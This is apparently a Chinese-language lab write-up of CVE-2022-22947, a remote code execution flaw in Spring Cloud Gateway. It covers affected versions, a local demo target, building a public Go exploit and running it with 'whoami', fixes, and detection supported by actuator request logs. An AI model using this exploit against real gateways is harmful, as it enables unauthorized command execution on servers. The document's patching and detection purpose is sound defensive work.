开源项目 Spring Cloud Gateway 的一个远程代码执行漏洞编号为 CVE-2022-22947
受影响的版本为:
- 3.1.0
- 3.0.0 到 3.0.6
- 旧的不受支持的版本也受影响
漏洞挖掘
靶场:
java -jar spring-gateway-demo-0.0.1-SNAPSHOT.jar --debug
. ____ _ __ _ _
/\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
\\/ ___)| |_)| | | | | || (_| | ) ) ) )
' |____| .__|_| |_|_| |_\__, | / / / /
=========|_|==============|___/=/_/_/_/
:: Spring Boot :: (v2.6.3-SNAPSHOT)
Netty started on port 9000
- gateway 网关关键词
$ curl http://localhost:9000/actuator
{"_links":{"self":{"href":"http://localhost:9000/actuator","templated":false},"gateway":{"href":"http://localhost:9000/actuator/gateway","templated":false}}}
exp
原仓库
$ git remote -v
origin https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway.git (fetch)
origin https://github.com/tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway.git (push)
$ go build main.go
go: downloading github.com/panjf2000/ants/v2 v2.4.8
go: downloading github.com/go-resty/resty/v2 v2.7.0
go: downloading golang.org/x/net v0.0.0-20211029224645-99673261e6eb
$ ./main -u http://127.0.0.1:9000 -c whoami
http://127.0.0.1:9000 'bin4xin\n'
修复方案
- 3.1.x 版本用户应升级到 3.1.1+ 版本,3.0.x 版本用户应升级到 3.0.7+ 版本。
- 在不影响业务的前提下,通过将配置选项 management.endpoint.gateway.enabled 设置为 false 禁用 gateway actuator endpoint。
检测思路
流量检测:分析 HTTP 流量,检测是否存在异常访问 actuator gateway API 的请求。
2022-03-15 10:22:26.711 DEBUG 11029 --- [ctor-http-nio-2] o.s.w.s.adapter.HttpWebHandlerAdapter : [68b629bb-1] HTTP POST "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-2] a.e.w.r.ControllerEndpointHandlerMapping : [68b629bb-1] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#save(String, RouteDefinition)
[ctor-http-nio-2] .r.m.a.RequestBodyMethodArgumentResolver : [68b629bb-1] Content-Type:application/json
[ctor-http-nio-2] .r.m.a.RequestBodyMethodArgumentResolver : [68b629bb-1] 0..1 [org.springframework.cloud.gateway.route.RouteDefinition]
[ctor-http-nio-2] o.s.http.codec.json.Jackson2JsonDecoder : [68b629bb-1] Decoded [RouteDefinition{id='LZQXX', predicates=[], filters=[FilterDefinition{name='AddResponseHeader', args= (truncated)...]
[ctor-http-nio-2] o.s.w.s.adapter.HttpWebHandlerAdapter : [68b629bb-1] Completed 201 CREATED
[ctor-http-nio-3] o.s.w.s.adapter.HttpWebHandlerAdapter : [36032421-2] HTTP POST "/actuator/gateway/refresh"
[ctor-http-nio-3] a.e.w.r.ControllerEndpointHandlerMapping : [36032421-2] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#refresh()
[ctor-http-nio-3] o.s.w.s.adapter.HttpWebHandlerAdapter : [36032421-2] Completed 200 OK
[ctor-http-nio-4] o.s.w.s.adapter.HttpWebHandlerAdapter : [9763438e-3] HTTP GET "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-4] a.e.w.r.ControllerEndpointHandlerMapping : [9763438e-3] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#route(String)
[ctor-http-nio-4] .s.w.r.r.m.a.ResponseEntityResultHandler : [9763438e-3] Using 'application/json' given [*/*] and supported [application/json, application/*+json, application/x-ndjson, text/event-stream]
[ctor-http-nio-4] .s.w.r.r.m.a.ResponseEntityResultHandler : [9763438e-3] 0..1 [java.util.Map<java.lang.String, java.lang.Object>]
[ctor-http-nio-4] o.s.http.codec.json.Jackson2JsonEncoder : [9763438e-3] Encoding [{predicate=RouteDefinitionRouteLocator$$Lambda$918/2002125647, route_id=LZQXX, filters=[[[AddRespons (truncated)...]
[ctor-http-nio-4] o.s.w.s.adapter.HttpWebHandlerAdapter : [9763438e-3] Completed 200 OK
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter : [1f92a2eb-4] HTTP DELETE "/actuator/gateway/routes/LZQXX"
[ctor-http-nio-5] a.e.w.r.ControllerEndpointHandlerMapping : [1f92a2eb-4] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#delete(String)
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter : [1f92a2eb-4] Completed 200 OK
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter : [1f92a2eb-5] HTTP POST "/actuator/gateway/refresh"
[ctor-http-nio-5] a.e.w.r.ControllerEndpointHandlerMapping : [1f92a2eb-5] Mapped to org.springframework.cloud.gateway.actuate.GatewayControllerEndpoint#refresh()
[ctor-http-nio-5] o.s.w.s.adapter.HttpWebHandlerAdapter : [1f92a2eb-5] Completed 200 OK
以上。